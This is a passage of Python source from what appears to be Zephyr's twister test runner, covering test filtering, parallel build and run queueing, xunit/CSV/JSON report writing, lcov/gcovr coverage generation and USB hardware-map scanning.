                if test_configuration in self.quarantine and not self.quarantine_verify:
                    discards[instance] = discards.get(instance,
                                                      f"Quarantine: {self.quarantine[test_configuration]}")
                # run only quarantined test to verify their statuses (skip everything else)
                if self.quarantine_verify and test_configuration not in self.quarantine:
                    discards[instance] = discards.get(instance, "Not under quarantine")

                # if nothing stopped us until now, it means this configuration
                # needs to be added.  NOTE: discarded instances are ALSO
                # appended here; they are only marked skipped/error later.
                instance_list.append(instance)

            # no configurations, so jump to next testcase
            if not instance_list:
                continue

            # if twister was launched with no platform options at all, we
            # take all default platforms
            if default_platforms and not tc.build_on_all and not integration:
                if tc.platform_allow:
                    a = set(self.default_platforms)
                    b = set(tc.platform_allow)
                    c = a.intersection(b)
                    if c:
                        aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
                        self.add_instances(aa)
                    else:
                        self.add_instances(instance_list)
                else:
                    instances = list(filter(lambda tc: tc.platform.default, instance_list))
                    self.add_instances(instances)
            elif integration:
                instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
                self.add_instances(instances)

            elif emulation_platforms:
                self.add_instances(instance_list)
                # double negation: keep instances whose simulation == 'na'
                for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
                    discards[instance] = discards.get(instance, "Not an emulated platform")
            else:
                self.add_instances(instance_list)

        for _, case in self.instances.items():
            case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)

        self.discards = discards
        self.selected_platforms = set(p.platform.name for p in self.instances.values())

        remove_from_discards = []  # configurations to be removed from discards.
        for instance in self.discards:
            instance.reason = self.discards[instance]
            # If integration mode is on all skips on integration_platforms are treated as errors.
            if self.integration and instance.platform.name in instance.testcase.integration_platforms \
                and "Quarantine" not in instance.reason:
                instance.status = "error"
                instance.reason += " but is one of the integration platforms"
                instance.fill_results_by_status()
                self.instances[instance.name] = instance
                # Such configuration has to be removed from discards to make sure it won't get skipped
                remove_from_discards.append(instance)
            else:
                instance.status = "skipped"
                instance.fill_results_by_status()

        self.filtered_platforms = set(p.platform.name for p in self.instances.values()
                                      if p.status != "skipped" )

        # Remove from discards configurations that must not be discarded
        # (e.g. integration_platforms when --integration was used)
        for instance in remove_from_discards:
            del self.discards[instance]

        return discards

    def add_instances(self, instance_list):
        """Register each instance into self.instances keyed by its name."""
        for instance in instance_list:
            self.instances[instance.name] = instance

    @staticmethod
    def calc_one_elf_size(instance):
        """Fill instance.metrics (ram/rom/unrecognized/handler_time) from the
        built ELF; native-type platforms get zeroed size metrics."""
        if instance.status not in ["error", "failed", "skipped"]:
            if instance.platform.type != "native":
                size_calc = instance.calculate_sizes()
                instance.metrics["ram_size"] = size_calc.get_ram_size()
                instance.metrics["rom_size"] = size_calc.get_rom_size()
                instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
            else:
                instance.metrics["ram_size"] = 0
                instance.metrics["rom_size"] = 0
                instance.metrics["unrecognized"] = []

            instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0

    def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False):
        """Seed the work pipeline: 'run' ops for already-built runnable
        instances in test_only mode, 'cmake' ops otherwise, and 'report' ops
        for instances that previously errored."""
        for instance in self.instances.values():
            if build_only:
                instance.run = False

            if instance.status not in ['passed', 'skipped', 'error']:
                logger.debug(f"adding {instance.name}")
                instance.status = None
                if test_only and instance.run:
                    pipeline.put({"op": "run", "test": instance})
                else:
                    pipeline.put({"op": "cmake", "test": instance})
            # If the instance got 'error' status before, proceed to the report stage
            if instance.status == "error":
                pipeline.put({"op": "report", "test": instance})

    def pipeline_mgr(self, pipeline, done_queue, lock, results):
        """Worker loop: drain tasks from the pipeline and hand each one to a
        ProjectBuilder until the queue is empty."""
        while True:
            try:
                task = pipeline.get_nowait()
            except queue.Empty:
                break
            else:
                test = task['test']
                pb = ProjectBuilder(self,
                                    test,
                                    lsan=self.enable_lsan,
                                    asan=self.enable_asan,
                                    ubsan=self.enable_ubsan,
                                    coverage=self.enable_coverage,
                                    extra_args=self.extra_args,
                                    device_testing=self.device_testing,
                                    cmake_only=self.cmake_only,
                                    cleanup=self.cleanup,
                                    valgrind=self.enable_valgrind,
                                    inline_logs=self.inline_logs,
                                    generator=self.generator,
                                    generator_cmd=self.generator_cmd,
                                    verbose=self.verbose,
                                    warnings_as_errors=self.warnings_as_errors,
                                    overflow_as_errors=self.overflow_as_errors
                                    )
                pb.process(pipeline, done_queue, task, lock, results)

        return True

    def execute(self, pipeline, done, results):
        """Run all queued jobs on self.jobs worker processes, then (unless
        cmake-only) compute size metrics for every instance.  Returns the
        shared results object."""
        lock = Lock()
        logger.info("Adding tasks to the queue...")
        self.add_tasks_to_queue(pipeline, self.build_only, self.test_only)
        logger.info("Added initial list of jobs to queue")

        processes = []
        for job in range(self.jobs):
            logger.debug(f"Launch process {job}")
            p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
            processes.append(p)
            p.start()

        try:
            for p in processes:
                p.join()
        except KeyboardInterrupt:
            logger.info("Execution interrupted")
            for p in processes:
                p.terminate()

        # FIXME: This needs to move out.
        if self.enable_size_report and not self.cmake_only:
            # Parallelize size calculation
            executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
            futures = [executor.submit(self.calc_one_elf_size, instance)
                       for instance in self.instances.values()]
            concurrent.futures.wait(futures)
        else:
            for instance in self.instances.values():
                instance.metrics["ram_size"] = 0
                instance.metrics["rom_size"] = 0
                instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
                instance.metrics["unrecognized"] = []

        return results

    def discard_report(self, filename):
        """Write the discarded configurations as CSV; exits(2) if
        apply_filters() has not populated self.discards yet."""
        try:
            if not self.discards:
                raise TwisterRuntimeError("apply_filters() hasn't been run!")
        except Exception as e:
            logger.error(str(e))
            sys.exit(2)

        with open(filename, "wt") as csvfile:
            fieldnames = ["test", "arch", "platform", "reason"]
            cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
            cw.writeheader()
            for instance, reason in sorted(self.discards.items()):
                rowdict = {"test": instance.testcase.name,
                           "arch": instance.platform.arch,
                           "platform": instance.platform.name,
                           "reason": reason}
                cw.writerow(rowdict)

    def target_report(self, outdir, suffix, append=False):
        """Emit one xunit XML file per platform that has instances."""
        platforms = {inst.platform.name for _, inst in self.instances.items()}
        for platform in platforms:
            if suffix:
                filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
            else:
                filename = os.path.join(outdir,"{}.xml".format(platform))
            self.xunit_report(filename, platform, full_report=True,
                              append=append, version=self.version)

    @staticmethod
    def process_log(log_file):
        """Return the log file's content with non-printable characters
        stripped; empty string if the file does not exist."""
        filtered_string = ""
        if os.path.exists(log_file):
            with open(log_file, "rb") as f:
                log = f.read().decode("utf-8")
                filtered_string = ''.join(filter(lambda x: x in string.printable, log))

        return filtered_string

    def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
        """Write (or, with append=True, merge into) a JUnit/xunit XML report.

        With platform set, only that platform is reported; full_report expands
        each individual testcase result rather than one entry per instance.
        Returns the (fails, passes, errors, skips) counters of the LAST
        platform processed.
        """
        total = 0
        fails = passes = errors = skips = 0
        if platform:
            selected = [platform]
            logger.info(f"Writing target report for {platform}...")
        else:
            logger.info(f"Writing xunit report (unknown)...")
            selected = self.selected_platforms

        if os.path.exists(filename) and append:
            tree = ET.parse(filename)
            eleTestsuites = tree.getroot()
        else:
            eleTestsuites = ET.Element('testsuites')

        for p in selected:
            inst = self.get_platform_instances(p)
            fails = 0
            passes = 0
            errors = 0
            skips = 0
            duration = 0

            for _, instance in inst.items():
                handler_time = instance.metrics.get('handler_time', 0)
                duration += handler_time

                if full_report and instance.run:
                    for k in instance.results.keys():
                        if instance.results[k] == 'PASS':
                            passes += 1
                        elif instance.results[k] == 'BLOCK':
                            errors += 1
                        elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
                            skips += 1
                        else:
                            fails += 1
                else:
                    if instance.status in ["error", "failed", "timeout", "flash_error"]:
                        if instance.reason in ['build_error', 'handler_crash']:
                            errors += 1
                        else:
                            fails += 1
                    elif instance.status == 'skipped':
                        skips += 1
                    elif instance.status == 'passed':
                        passes += 1
                    else:
                        if instance.status:
                            logger.error(f"{instance.name}: Unknown status {instance.status}")
                        else:
                            logger.error(f"{instance.name}: No status")

            total = (errors + passes + fails + skips)

            # do not produce a report if no tests were actually run (only built)
            if total == 0:
                continue

            run = p
            eleTestsuite = None

            # When we re-run the
            # (cont'd) tests, we re-use the results and update only with
            # the newly run tests.
            if os.path.exists(filename) and append:
                ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
                if ts:
                    eleTestsuite = ts[0]
                    eleTestsuite.attrib['failures'] = "%d" % fails
                    eleTestsuite.attrib['errors'] = "%d" % errors
                    eleTestsuite.attrib['skipped'] = "%d" % skips
                else:
                    logger.info(f"Did not find any existing results for {p}")
                    eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
                                                 name=run, time="%f" % duration,
                                                 tests="%d" % (total),
                                                 failures="%d" % fails,
                                                 errors="%d" % (errors), skipped="%s" % (skips))
                    eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
                    # Multiple 'property' can be added to 'properties'
                    # differing by name and value
                    ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
            else:
                eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
                                             name=run, time="%f" % duration,
                                             tests="%d" % (total),
                                             failures="%d" % fails,
                                             errors="%d" % (errors), skipped="%s" % (skips))
                eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
                # Multiple 'property' can be added to 'properties'
                # differing by name and value
                ET.SubElement(eleTSPropetries, 'property', name="version", value=version)

            for _, instance in inst.items():
                if full_report:
                    tname = os.path.basename(instance.testcase.name)
                else:
                    tname = instance.testcase.id
                handler_time = instance.metrics.get('handler_time', 0)

                if full_report:
                    for k in instance.results.keys():
                        # remove testcases that are being re-run from existing reports
                        for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
                            eleTestsuite.remove(tc)

                        classname = ".".join(tname.split(".")[:2])
                        eleTestcase = ET.SubElement(
                            eleTestsuite, 'testcase',
                            classname=classname,
                            name="%s" % (k), time="%f" % handler_time)
                        if instance.results[k] in ['FAIL', 'BLOCK'] or \
                            (not instance.run and instance.status in ["error", "failed", "timeout"]):
                            # FAIL maps to <failure>, everything else here to <error>.
                            if instance.results[k] == 'FAIL':
                                el = ET.SubElement(
                                    eleTestcase,
                                    'failure',
                                    type="failure",
                                    message="failed")
                            else:
                                el = ET.SubElement(
                                    eleTestcase,
                                    'error',
                                    type="failure",
                                    message=instance.reason)
                            log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
                            log_file = os.path.join(log_root, "handler.log")
                            el.text = self.process_log(log_file)

                        elif instance.results[k] == 'PASS' \
                            or (not instance.run and instance.status in ["passed"]):
                            pass
                        elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
                            el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
                        else:
                            el = ET.SubElement(
                                eleTestcase,
                                'error',
                                type="error",
                                message=f"{instance.reason}")
                else:
                    if platform:
                        classname = ".".join(instance.testcase.name.split(".")[:2])
                    else:
                        classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])

                    # remove testcases that are being re-run from existing reports
                    for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
                        eleTestsuite.remove(tc)

                    eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
                                                classname=classname,
                                                name="%s" % (instance.testcase.name),
                                                time="%f" % handler_time)

                    if instance.status in ["error", "failed", "timeout", "flash_error"]:
                        failure = ET.SubElement(
                            eleTestcase,
                            'failure',
                            type="failure",
                            message=instance.reason)

                        log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
                        bl = os.path.join(log_root, "build.log")
                        hl = os.path.join(log_root, "handler.log")
                        # Prefer the handler log unless the failure was a build error.
                        log_file = bl
                        if instance.reason != 'Build error':
                            if os.path.exists(hl):
                                log_file = hl
                            else:
                                log_file = bl

                        failure.text = self.process_log(log_file)

                    elif instance.status == "skipped":
                        ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")

        result = ET.tostring(eleTestsuites)
        with open(filename, 'wb') as report:
            report.write(result)

        return fails, passes, errors, skips

    def csv_report(self, filename):
        """Write one CSV row per instance with status and size/time metrics."""
        with open(filename, "wt") as csvfile:
            fieldnames = ["test", "arch", "platform", "status",
                          "extra_args", "handler", "handler_time", "ram_size",
                          "rom_size"]
            cw = \
                csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
            cw.writeheader()
            for instance in self.instances.values():
                rowdict = {"test": instance.testcase.name,
                           "arch": instance.platform.arch,
                           "platform": instance.platform.name,
                           "extra_args": " ".join(instance.testcase.extra_args),
                           "handler": instance.platform.simulation}

                rowdict["status"] = instance.status
                # metrics are only meaningful for instances that got past build/run
                if instance.status not in ["error", "failed", "timeout"]:
                    if instance.handler:
                        rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
                    ram_size = instance.metrics.get("ram_size", 0)
                    rom_size = instance.metrics.get("rom_size", 0)
                    rowdict["ram_size"] = ram_size
                    rowdict["rom_size"] = rom_size
                cw.writerow(rowdict)

    def json_report(self, filename, append=False, version="NA"):
        """Write (or merge into, with append=True) a JSON report with one
        entry per (testcase, platform); duplicates from a previous run are
        replaced by the fresh result."""
        logger.info(f"Writing JSON report (unknown)")
        report = {}
        selected = self.selected_platforms
        report["environment"] = {"os": os.name,
                                 "zephyr_version": version,
                                 "toolchain": self.get_toolchain()
                                 }
        json_data = {}
        if os.path.exists(filename) and append:
            with open(filename, 'r') as json_file:
                json_data = json.load(json_file)

        suites = json_data.get("testsuites", [])
        if suites:
            suite = suites[0]
            testcases = suite.get("testcases", [])
        else:
            suite = {}
            testcases = []

        for p in selected:
            inst = self.get_platform_instances(p)
            for _, instance in inst.items():
                testcase = {}
                handler_log = os.path.join(instance.build_dir, "handler.log")
                build_log = os.path.join(instance.build_dir, "build.log")
                device_log = os.path.join(instance.build_dir, "device.log")

                handler_time = instance.metrics.get('handler_time', 0)
                ram_size = instance.metrics.get("ram_size", 0)
                rom_size = instance.metrics.get("rom_size", 0)
                for k in instance.results.keys():
                    # drop any stale entry for this (testcase, platform) pair
                    testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases))
                    testcase = {"testcase": k,
                                "arch": instance.platform.arch,
                                "platform": p,
                                }
                    if ram_size:
                        testcase["ram_size"] = ram_size
                    if rom_size:
                        testcase["rom_size"] = rom_size

                    if instance.results[k] in ["SKIP"] or instance.status == 'skipped':
                        testcase["status"] = "skipped"
                        testcase["reason"] = instance.reason
                    elif instance.results[k] in ["PASS"] or instance.status == 'passed':
                        testcase["status"] = "passed"
                        if instance.handler:
                            testcase["execution_time"] = handler_time
                    elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]:
                        testcase["status"] = "failed"
                        testcase["reason"] = instance.reason
                        testcase["execution_time"] = handler_time
                        # Attach the most specific log available.
                        if os.path.exists(handler_log):
                            testcase["test_output"] = self.process_log(handler_log)
                        elif os.path.exists(device_log):
                            testcase["device_log"] = self.process_log(device_log)
                        else:
                            testcase["build_log"] = self.process_log(build_log)
                    testcases.append(testcase)

        suites = [ {"testcases": testcases} ]
        report["testsuites"] = suites

        with open(filename, "wt") as json_file:
            json.dump(report, json_file, indent=4, separators=(',',':'))

    def get_testcase(self, identifier):
        """Return every testcase object containing a case named `identifier`."""
        results = []
        for _, tc in self.testcases.items():
            for case in tc.cases:
                if case == identifier:
                    results.append(tc)
        return results

    def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
        """
        Verify if platform name (passed by --platform option, or in yaml file
        as platform_allow or integration_platforms options) is correct. If not -
        log error.
        """
        for platform in platform_names_to_verify:
            if platform in self.platform_names:
                # NOTE(review): `break` stops checking at the first recognized
                # name, so names after it are never verified — confirm whether
                # the intent was `if platform not in self.platform_names: log`.
                break
            else:
                logger.error(f"{log_info} - unrecognized platform - {platform}")


class CoverageTool:
    """ Base class for every supported coverage tool
    """

    def __init__(self):
        # Both attributes are expected to be set by the caller before use.
        self.gcov_tool = None
        self.base_dir = None

    @staticmethod
    def factory(tool):
        """Return an Lcov or Gcovr instance for `tool`, or None (with an
        error logged) for an unknown tool name."""
        if tool == 'lcov':
            t = Lcov()
        elif tool == 'gcovr':
            t = Gcovr()
        else:
            logger.error("Unsupported coverage tool specified: {}".format(tool))
            return None

        logger.debug(f"Select {tool} as the coverage tool...")
        return t

    @staticmethod
    def retrieve_gcov_data(input_file):
        """Parse a handler.log for the GCOV dump markers and return
        {'complete': bool, 'data': {file_name: hex_dump}}."""
        logger.debug("Working on %s" % input_file)
        extracted_coverage_info = {}
        capture_data = False
        capture_complete = False
        with open(input_file, 'r') as fp:
            for line in fp.readlines():
                if re.search("GCOV_COVERAGE_DUMP_START", line):
                    capture_data = True
                    continue
                if re.search("GCOV_COVERAGE_DUMP_END", line):
                    capture_complete = True
                    break
                # Loop until the coverage data is found.
                if not capture_data:
                    continue
                # Data lines look like "*<path><hexdump>\n".
                if line.startswith("*"):
                    sp = line.split("<")
                    if len(sp) > 1:
                        # Remove the leading delimiter "*"
                        file_name = sp[0][1:]
                        # Remove the trailing new line char
                        hex_dump = sp[1][:-1]
                    else:
                        continue
                else:
                    continue
                extracted_coverage_info.update({file_name: hex_dump})
        # A log with no dump at all counts as "complete" (nothing to capture).
        if not capture_data:
            capture_complete = True
        return {'complete': capture_complete, 'data': extracted_coverage_info}

    @staticmethod
    def create_gcda_files(extracted_coverage_info):
        """Materialize each captured hex dump as a .gcda file on disk."""
        logger.debug("Generating gcda files")
        for filename, hexdump_val in extracted_coverage_info.items():
            # if kobject_hash is given for coverage gcovr fails
            # hence skipping it problem only in gcovr v4.1
            if "kobject_hash" in filename:
                filename = (filename[:-4]) + "gcno"
                try:
                    os.remove(filename)
                except Exception:
                    pass
                continue

            with open(filename, 'wb') as fp:
                fp.write(bytes.fromhex(hexdump_val))

    def generate(self, outdir):
        """Collect gcov dumps from every handler.log under outdir, write the
        .gcda files, then run the tool-specific _generate() step."""
        for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
            gcov_data = self.__class__.retrieve_gcov_data(filename)
            capture_complete = gcov_data['complete']
            extracted_coverage_info = gcov_data['data']
            if capture_complete:
                self.__class__.create_gcda_files(extracted_coverage_info)
                logger.debug("Gcov data captured: {}".format(filename))
            else:
                logger.error("Gcov data capture incomplete: {}".format(filename))

        with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
            ret = self._generate(outdir, coveragelog)
            if ret == 0:
                logger.info("HTML report generated: {}".format(
                    os.path.join(outdir, "coverage", "index.html")))


class Lcov(CoverageTool):
    """Coverage backend driving lcov/genhtml."""

    def __init__(self):
        super().__init__()
        self.ignores = []

    def add_ignore_file(self, pattern):
        # lcov glob patterns: match the pattern anywhere in the path
        self.ignores.append('*' + pattern + '*')

    def add_ignore_directory(self, pattern):
        self.ignores.append('*/' + pattern + '/*')

    def _generate(self, outdir, coveragelog):
        """Capture coverage with lcov, carve out/keep the ztest subsets,
        apply ignores, and render HTML via genhtml.  Returns genhtml's exit
        status (0 on success)."""
        coveragefile = os.path.join(outdir, "coverage.info")
        ztestfile = os.path.join(outdir, "ztest.info")
        cmd = ["lcov", "--gcov-tool", self.gcov_tool,
               "--capture", "--directory", outdir,
               "--rc", "lcov_branch_coverage=1",
               "--output-file", coveragefile]
        cmd_str = " ".join(cmd)
        logger.debug(f"Running {cmd_str}...")
        subprocess.call(cmd, stdout=coveragelog)
        # We want to remove tests/* and tests/ztest/test/* but save tests/ztest
        subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
                         coveragefile,
                         os.path.join(self.base_dir, "tests", "ztest", "*"),
                         "--output-file", ztestfile,
                         "--rc", "lcov_branch_coverage=1"], stdout=coveragelog)

        if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
            subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
                             ztestfile,
                             os.path.join(self.base_dir, "tests/ztest/test/*"),
                             "--output-file", ztestfile,
                             "--rc", "lcov_branch_coverage=1"],
                            stdout=coveragelog)
            files = [coveragefile, ztestfile]
        else:
            files = [coveragefile]

        for i in self.ignores:
            subprocess.call(
                ["lcov", "--gcov-tool", self.gcov_tool, "--remove",
                 coveragefile, i, "--output-file",
                 coveragefile, "--rc", "lcov_branch_coverage=1"],
                stdout=coveragelog)

        # The --ignore-errors source option is added to avoid it exiting due to
        # samples/application_development/external_lib/
        return subprocess.call(["genhtml", "--legend", "--branch-coverage",
                                "--ignore-errors", "source",
                                "-output-directory",
                                os.path.join(outdir, "coverage")] + files,
                               stdout=coveragelog)


class Gcovr(CoverageTool):
    """Coverage backend driving gcovr (JSON intermediate + HTML output)."""

    def __init__(self):
        super().__init__()
        self.ignores = []

    def add_ignore_file(self, pattern):
        # gcovr takes regexes, not globs
        self.ignores.append('.*' + pattern + '.*')

    def add_ignore_directory(self, pattern):
        self.ignores.append(".*/" + pattern + '/.*')

    @staticmethod
    def _interleave_list(prefix, list):
        """Turn [a, b] into [prefix, a, prefix, b] for repeated CLI options."""
        tuple_list = [(prefix, item) for item in list]
        return [item for sublist in tuple_list for item in sublist]

    def _generate(self, outdir, coveragelog):
        """Produce gcovr JSON tracefiles (overall + ztest subset) and merge
        them into an HTML report.  Returns the final gcovr exit status."""
        coveragefile = os.path.join(outdir, "coverage.json")
        ztestfile = os.path.join(outdir, "ztest.json")

        excludes = Gcovr._interleave_list("-e", self.ignores)

        # We want to remove tests/* and tests/ztest/test/* but save tests/ztest
        cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
               self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
                                                              coveragefile, outdir]
        cmd_str = " ".join(cmd)
        logger.debug(f"Running {cmd_str}...")
        subprocess.call(cmd, stdout=coveragelog)

        subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
                         self.gcov_tool, "-f", "tests/ztest", "-e",
                         "tests/ztest/test/*", "--json", "-o", ztestfile,
                         outdir], stdout=coveragelog)

        if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
            files = [coveragefile, ztestfile]
        else:
            files = [coveragefile]

        subdir = os.path.join(outdir, "coverage")
        os.makedirs(subdir, exist_ok=True)

        tracefiles = self._interleave_list("--add-tracefile", files)

        return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
                                "--html-details"] + tracefiles +
                               ["-o", os.path.join(subdir, "index.html")],
                               stdout=coveragelog)


class DUT(object):
    """A device-under-test entry: serial connection details plus process-safe
    availability/usage counters shared across worker processes."""

    def __init__(self,
                 id=None,
                 serial=None,
                 serial_baud=None,
                 platform=None,
                 product=None,
                 serial_pty=None,
                 connected=False,
                 pre_script=None,
                 post_script=None,
                 post_flash_script=None,
                 runner=None):

        self.serial = serial
        self.baud = serial_baud or 115200
        self.platform = platform
        self.serial_pty = serial_pty
        # multiprocessing.Value: shared across worker processes
        self._counter = Value("i", 0)
        self._available = Value("i", 1)
        self.connected = connected
        self.pre_script = pre_script
        self.id = id
        self.product = product
        self.runner = runner
        self.fixtures = []
        self.post_flash_script = post_flash_script
        self.post_script = post_script
        self.pre_script = pre_script  # NOTE(review): duplicate of the assignment above
        self.probe_id = None
        self.notes = None
        self.lock = Lock()
        self.match = False

    @property
    def available(self):
        with self._available.get_lock():
            return self._available.value

    @available.setter
    def available(self, value):
        with self._available.get_lock():
            self._available.value = value

    @property
    def counter(self):
        with self._counter.get_lock():
            return self._counter.value

    @counter.setter
    def counter(self, value):
        with self._counter.get_lock():
            self._counter.value = value

    def to_dict(self):
        """Serialize truthy public attributes (drops the shared Values and
        the transient `match` flag)."""
        d = {}
        exclude = ['_available', '_counter', 'match']
        v = vars(self)
        for k in v.keys():
            if k not in exclude and v[k]:
                d[k] = v[k]
        return d

    def __repr__(self):
        return f"<{self.platform} ({self.product}) on {self.serial}>"


class HardwareMap:
    """Loads, scans, persists, and prints the map of connected test hardware."""

    schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")

    # USB manufacturers we recognize when scanning serial ports.
    manufacturer = [
        'ARM',
        'SEGGER',
        'MBED',
        'STMicroelectronics',
        'Atmel Corp.',
        'Texas Instruments',
        'Silicon Labs',
        'NXP Semiconductors',
        'Microchip Technology Inc.',
        'FTDI',
        'Digilent'
    ]

    # Maps a flash runner to product strings (exact or regex) it can drive.
    runner_mapping = {
        'pyocd': [
            'DAPLink CMSIS-DAP',
            'MBED CMSIS-DAP'
        ],
        'jlink': [
            'J-Link',
            'J-Link OB'
        ],
        'openocd': [
            'STM32 STLink', '^XDS110.*', 'STLINK-V3'
        ],
        'dediprog': [
            'TTL232R-3V3',
            'MCP2200 USB Serial Port Emulator'
        ]
    }

    def __init__(self):
        self.detected = []  # DUTs found by scan()
        self.duts = []      # DUTs configured via load()/add_device()

    def add_device(self, serial, platform, pre_script, is_pty, baud=None):
        """Register a manually-specified device; `serial` is either a device
        node or a pty command depending on is_pty."""
        device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
        if is_pty:
            device.serial_pty = serial
        else:
            device.serial = serial

        self.duts.append(device)

    def load(self, map_file):
        """Populate self.duts from a YAML hardware-map file validated against
        the schema."""
        hwm_schema = scl.yaml_load(self.schema_path)
        duts = scl.yaml_load_verify(map_file, hwm_schema)
        for dut in duts:
            pre_script = dut.get('pre_script')
            post_script = dut.get('post_script')
            post_flash_script = dut.get('post_flash_script')
            platform = dut.get('platform')
            id = dut.get('id')
            runner = dut.get('runner')
            serial = dut.get('serial')
            baud = dut.get('baud', None)
            product = dut.get('product')
            fixtures = dut.get('fixtures', [])
            new_dut = DUT(platform=platform,
                          product=product,
                          runner=runner,
                          id=id,
                          serial=serial,
                          serial_baud=baud,
                          connected=serial is not None,
                          pre_script=pre_script,
                          post_script=post_script,
                          post_flash_script=post_flash_script)
            new_dut.fixtures = fixtures
            new_dut.counter = 0
            self.duts.append(new_dut)

    def scan(self, persistent=False):
        """Scan USB serial ports for known hardware and fill self.detected.

        With persistent=True on Linux, record the stable
        /dev/serial/by-id symlink instead of the volatile /dev/ttyACMx node.
        """
        from serial.tools import list_ports

        if persistent and platform.system() == 'Linux':
            # On Linux, /dev/serial/by-id provides symlinks to
            # '/dev/ttyACMx' nodes using names which are unique as
            # long as manufacturers fill out USB metadata nicely.
            #
            # This creates a map from '/dev/ttyACMx' device nodes
            # to '/dev/serial/by-id/usb-...' symlinks. The symlinks
            # go into the hardware map because they stay the same
            # even when the user unplugs / replugs the device.
            #
            # Some inexpensive USB/serial adapters don't result
            # in unique names here, though, so use of this feature
            # requires explicitly setting persistent=True.

            by_id = Path('/dev/serial/by-id')

            def readlink(link):
                return str((by_id / link).resolve())

            persistent_map = {readlink(link): str(link)
                              for link in by_id.iterdir()}
        else:
            persistent_map = {}

        serial_devices = list_ports.comports()
        logger.info("Scanning connected hardware...")
        for d in serial_devices:
            if d.manufacturer in self.manufacturer:

                # TI XDS110 can have multiple serial devices for a single board
                # assume endpoint 0 is the serial, skip all others
                if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
                    continue
                s_dev = DUT(platform="unknown",
                            id=d.serial_number,
                            serial=persistent_map.get(d.device, d.device),
                            product=d.product,
                            runner='unknown',
                            connected=True)

                for runner, _ in self.runner_mapping.items():
                    products = self.runner_mapping.get(runner)
                    if d.product in products:
                        s_dev.runner = runner
                        # exact match found for this runner; skip its regexes
                        continue
                    # Try regex matching
                    for p in products:
                        if re.match(p, d.product):
                            s_dev.runner = runner

                s_dev.connected = True
                # a multiprocessing Lock can't be YAML-serialized; drop it here
                s_dev.lock = None
                self.detected.append(s_dev)
            else:
                logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))

    def save(self, hwm_file):
        """Persist detected hardware to `hwm_file`, merging with an existing
        map (matching entries by id+product) or creating a fresh file."""
        # use existing map
        self.detected.sort(key=lambda x: x.serial or '')
        if os.path.exists(hwm_file):
            with open(hwm_file, 'r') as yaml_file:
                hwm = yaml.load(yaml_file, Loader=SafeLoader)
                if hwm:
                    hwm.sort(key=lambda x: x['serial'] or '')

                    # disconnect everything
                    for h in hwm:
                        h['connected'] = False
                        h['serial'] = None

                    # re-attach serials for devices that are present right now
                    for _detected in self.detected:
                        for h in hwm:
                            if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
                                h['connected'] = True
                                h['serial'] = _detected.serial
                                _detected.match = True

                new_duts = list(filter(lambda d: not d.match, self.detected))
                new = []
                for d in new_duts:
                    new.append(d.to_dict())

                if hwm:
                    hwm = hwm + new
                else:
                    hwm = new

            with open(hwm_file, 'w') as yaml_file:
                yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)

            self.load(hwm_file)
            logger.info("Registered devices:")
            self.dump()

        else:
            # create new file
            dl = []
            for _connected in self.detected:
                platform = _connected.platform
                id = _connected.id
                runner = _connected.runner
                serial = _connected.serial
                product = _connected.product
                d = {
                    'platform': platform,
                    'id': id,
                    'runner': runner,
                    'serial': serial,
                    'product': product,
                    'connected': _connected.connected
                }
                dl.append(d)
            with open(hwm_file, 'w') as yaml_file:
                yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
            logger.info("Detected devices:")
            self.dump(detected=True)

    # NOTE(review): mutable default args ([]) are safe here because they are
    # only read, never mutated — but `filtered=None`/`header=None` would be
    # the safer idiom.
